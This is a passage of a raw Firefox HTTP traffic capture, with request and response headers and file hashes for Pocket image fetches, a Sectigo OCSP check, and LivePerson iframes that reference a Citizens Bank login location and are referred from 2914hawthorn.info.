Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         178.249.97.98
HTTP/2 200 OK
content-type: application/javascript
                                        
date: Fri, 30 Sep 2022 21:47:54 GMT
last-modified: Wed, 16 Jun 2021 19:00:26 GMT
content-encoding: gzip
server: ws
vary: Origin
access-control-allow-methods: GET, POST, PATCH
access-control-allow-headers: Origin, X-Requested-With, Content-Type, Accept, Authorization, X-HTTP-Method-Override, LP-DOMAIN-REFERER, LP-URL, ETag, ac-revision, X-LP-Last-Modified, If-Match, Authentication-Method, Credit-Card-Ref, Automation-Secret, Email-Token, x-lp-state-rev
access-control-expose-headers: X-Requested-With, X-HTTP-Method-Override, LP-DOMAIN-REFERER, LP-URL, ETag, ac-revision, X-LP-Last-Modified, If-Match, Authentication-Method, Credit-Card-Ref, Automation-Secret, Email-Token, x-lp-host, Lp-Req-Time, date, x-application-context, strict-transport-security, x-content-type-options, x-download-options, x-xss-protection, x-cache-status, x-amz-id-2, x-amz-request-id, expires, last-modified, set-cookie, content-security-policy, x-frame-options, x-lp-state-rev
access-control-allow-credentials: true
expires: Sat, 30 Sep 2023 21:47:54 GMT
cache-control: max-age=31536000
x-content-type-options: nosniff
strict-transport-security: max-age=31536000; includeSubDomains
x-cache-status: MISS
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  data
Size:   25188
Md5:    6ac611adba8be3a237f3add1be57d353
Sha1:   bb6a2e15eee31b700de8044024dcefff492b06d6
Sha256: 6d708623b6d3b513f1a871d8a2325f3e00cf3e08c4efb1b9bfba95ffe5b461d9
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fe12af206-9f17-40de-9764-14d3cdcb4d2f.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 6722
x-amzn-requestid: 6aca2e04-02b4-4e42-8bba-9bbe2ace1ed0
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: ZPeLrGq1oAMFuAw=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-633610b0-65b0664d0233107029ef0157;Sampled=0
x-amzn-remapped-date: Thu, 29 Sep 2022 21:40:00 GMT
x-amz-cf-pop: HIO50-C1, SEA73-P1
x-cache: Hit from cloudfront
x-amz-cf-id: DClqs8vTlqibRwXU8dIkkFCUxigTLduturaxCfuvsMtDm-4VXjx2mg==
via: 1.1 4dde8ec6d6c12741888c2d3a059d4a2e.cloudfront.net (CloudFront), 1.1 09331f0822fc98eebaf04130a83dbd44.cloudfront.net (CloudFront), 1.1 google
date: Thu, 29 Sep 2022 22:12:16 GMT
age: 84938
etag: "3248ca3a8b88efd5be8499898fce957d096cf211"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   6722
Md5:    5b8d0a19bc0a56bb40a975c5c71af05a
Sha1:   3248ca3a8b88efd5be8499898fce957d096cf211
Sha256: da44d6dd845dc400b0b76f19c67e5a79d9359ce24fe5e4490477f195b23203b4
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F98c23448-09e3-4c05-86c5-dafbe6ca8a0e.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 8059
x-amzn-requestid: f8bb9e4b-9f3c-47ba-8524-de16155e536d
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: ZNepwHAVoAMFvNA=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-633544a4-5d884e29378635b60592b618;Sampled=0
x-amzn-remapped-date: Thu, 29 Sep 2022 07:09:24 GMT
x-amz-cf-pop: HIO50-C1, SEA73-P1
x-cache: Hit from cloudfront
x-amz-cf-id: NMiKZSkokVXNTV76vsVJ7VEu6YFfT9MqL7tHtT8CwZq0BwTbXOpm6Q==
via: 1.1 000f4a2f631bace380a0afa747a82482.cloudfront.net (CloudFront), 1.1 ead78c395f4bede3ec6cd7ea180e3d3a.cloudfront.net (CloudFront), 1.1 google
date: Fri, 30 Sep 2022 06:34:26 GMT
age: 54808
etag: "86dd3bf133e9eddf8852f39e1ee695ee599ac886"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   8059
Md5:    d21d2bdcedbd619a80017054076319f9
Sha1:   86dd3bf133e9eddf8852f39e1ee695ee599ac886
Sha256: fc5672d5a8e9c6a5ec531f7ba05b65c192af37edf6c3a48105df3685de44ec0d
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F6d906d66-cd90-4963-827e-8d0564c0f787.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 5106
x-amzn-requestid: a906507c-8820-489c-9978-7d0fd026c862
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: ZPd5PE0MIAMF3DA=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-6336103a-49eb3879088f17bc01d177c7;Sampled=0
x-amzn-remapped-date: Thu, 29 Sep 2022 21:38:02 GMT
x-amz-cf-pop: SEA19-C2
x-cache: Miss from cloudfront
x-amz-cf-id: aeTAqh8D5whTHS3seyOUj7QCNaITUh2ekHG8vNWZlpSeAnqPuFzmcQ==
via: 1.1 41e349e25dc4bc856d0e5d2c162428a0.cloudfront.net (CloudFront), 1.1 57a21088b36c69a83578b5a5579df58e.cloudfront.net (CloudFront), 1.1 google
date: Fri, 30 Sep 2022 21:45:50 GMT
age: 124
etag: "3481dce8ab711111fc8863d88bee1a887cfd43ac"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   5106
Md5:    13a12db696bc2bf6a6ea2f48f4c1428e
Sha1:   3481dce8ab711111fc8863d88bee1a887cfd43ac
Sha256: 6dae6c9e5de4146e1f528a36a1795225c9731385f13927fc001fb3f9842fe8f1
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F9789cead-4e6c-4a12-9b45-25d0efd38fc9.png HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 16011
x-amzn-requestid: d58dfdcd-383a-45ac-8ae2-2b97f016b6a4
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: ZPdbjFy1IAMF84A=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-63360f7c-1ca9707a5e5087fd769d9ab6;Sampled=0
x-amzn-remapped-date: Thu, 29 Sep 2022 21:34:52 GMT
x-amz-cf-pop: HIO50-C1, SEA73-P1
x-cache: Miss from cloudfront
x-amz-cf-id: QKHN1asEv6w1mTLxsmn7Oj5AZTsPcg0H8zv5_qQ1BYptjL254kCZdA==
via: 1.1 28a7186077f9b5270d98dd053f31303e.cloudfront.net (CloudFront), 1.1 d01e7742f82df0bbc1fb681d709ed69c.cloudfront.net (CloudFront), 1.1 google
date: Thu, 29 Sep 2022 22:20:36 GMT
age: 84438
etag: "78b798f2cfa7db13a6b5ca2ca2783bece5e77d5d"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   16011
Md5:    1389b1d624b44706c7a6f6b7eb769241
Sha1:   78b798f2cfa7db13a6b5ca2ca2783bece5e77d5d
Sha256: c3c2526b98be06fc7e793e1150bacde2a7bd718e29a851a6e6992e8d84333790
                                        
                                            POST / HTTP/1.1 
Host: ocsp.sectigo.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         104.18.32.68
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Fri, 30 Sep 2022 21:47:55 GMT
Content-Length: 471
Connection: keep-alive
Last-Modified: Wed, 28 Sep 2022 13:42:46 GMT
Expires: Wed, 05 Oct 2022 13:42:45 GMT
Etag: "2de84cb810b6e40f17384ee270b4d642977246eb"
Cache-Control: max-age=402289,s-maxage=1800,public,no-transform,must-revalidate
X-CCACDN-Proxy-ID: mcdpinlb5
X-Frame-Options: SAMEORIGIN
CF-Cache-Status: DYNAMIC
Server: cloudflare
CF-RAY: 753028e41f121c16-OSL

                                        
                                            GET /le_secure_storage/3.13.1.0-release_5043/storage.secure.min.html?loc=https%3A%2F%2Fwww3.citizensbankonline.com&site=83789770&ist=sessionStorage&env=prod&isCrossDomain=true HTTP/1.1 
Host: lpcdn.lpsnmedia.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://2914hawthorn.info/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: iframe
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
TE: trailers

                                         
                                         178.249.97.98
HTTP/2 200 OK
content-type: text/html
                                        
date: Fri, 30 Sep 2022 21:47:54 GMT
last-modified: Wed, 16 Jun 2021 19:00:26 GMT
content-encoding: gzip
server: ws
vary: Origin
access-control-allow-methods: GET, POST, PATCH
access-control-allow-headers: Origin, X-Requested-With, Content-Type, Accept, Authorization, X-HTTP-Method-Override, LP-DOMAIN-REFERER, LP-URL, ETag, ac-revision, X-LP-Last-Modified, If-Match, Authentication-Method, Credit-Card-Ref, Automation-Secret, Email-Token, x-lp-state-rev
access-control-expose-headers: X-Requested-With, X-HTTP-Method-Override, LP-DOMAIN-REFERER, LP-URL, ETag, ac-revision, X-LP-Last-Modified, If-Match, Authentication-Method, Credit-Card-Ref, Automation-Secret, Email-Token, x-lp-host, Lp-Req-Time, date, x-application-context, strict-transport-security, x-content-type-options, x-download-options, x-xss-protection, x-cache-status, x-amz-id-2, x-amz-request-id, expires, last-modified, set-cookie, content-security-policy, x-frame-options, x-lp-state-rev
access-control-allow-credentials: true
expires: Sat, 30 Sep 2023 21:47:54 GMT
cache-control: max-age=31536000
x-content-type-options: nosniff
strict-transport-security: max-age=31536000; includeSubDomains
x-cache-status: MISS
X-Firefox-Spdy: h2


--- Additional Info ---
                                        
                                            GET /postmessage/postmessage.min.html?bust=1631342584828&loc=https%3A%2F%2Fwww3.citizensbankonline.com HTTP/1.1 
Host: va.idp.liveperson.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://2914hawthorn.info/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: iframe
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site

                                         
                                         208.89.15.170
HTTP/2 200 OK
content-type: text/html
                                        
date: Fri, 30 Sep 2022 21:47:55 GMT
last-modified: Sun, 09 Aug 2020 13:04:00 GMT
etag: W/"5f2ff440-2a51"
server: ws
strict-transport-security: max-age=31536000; includeSubDomains
access-control-allow-methods: GET, POST, PATCH
access-control-allow-headers: Origin, X-Requested-With, Content-Type, Accept, Authorization, X-HTTP-Method-Override, LP-DOMAIN-REFERER, LP-URL, ETag, ac-revision, X-LP-Last-Modified, If-Match, Authentication-Method, Credit-Card-Ref, Automation-Secret, Email-Token, x-lp-state-rev
access-control-expose-headers: X-Requested-With, X-HTTP-Method-Override, LP-DOMAIN-REFERER, LP-URL, ETag, ac-revision, X-LP-Last-Modified, If-Match, Authentication-Method, Credit-Card-Ref, Automation-Secret, Email-Token, x-lp-host, Lp-Req-Time, date, x-application-context, strict-transport-security, x-content-type-options, x-download-options, x-xss-protection, x-cache-status, x-amz-id-2, x-amz-request-id, expires, last-modified, set-cookie, content-security-policy, x-frame-options, x-lp-state-rev
access-control-allow-credentials: true
content-encoding: gzip
X-Firefox-Spdy: h2


--- Additional Info ---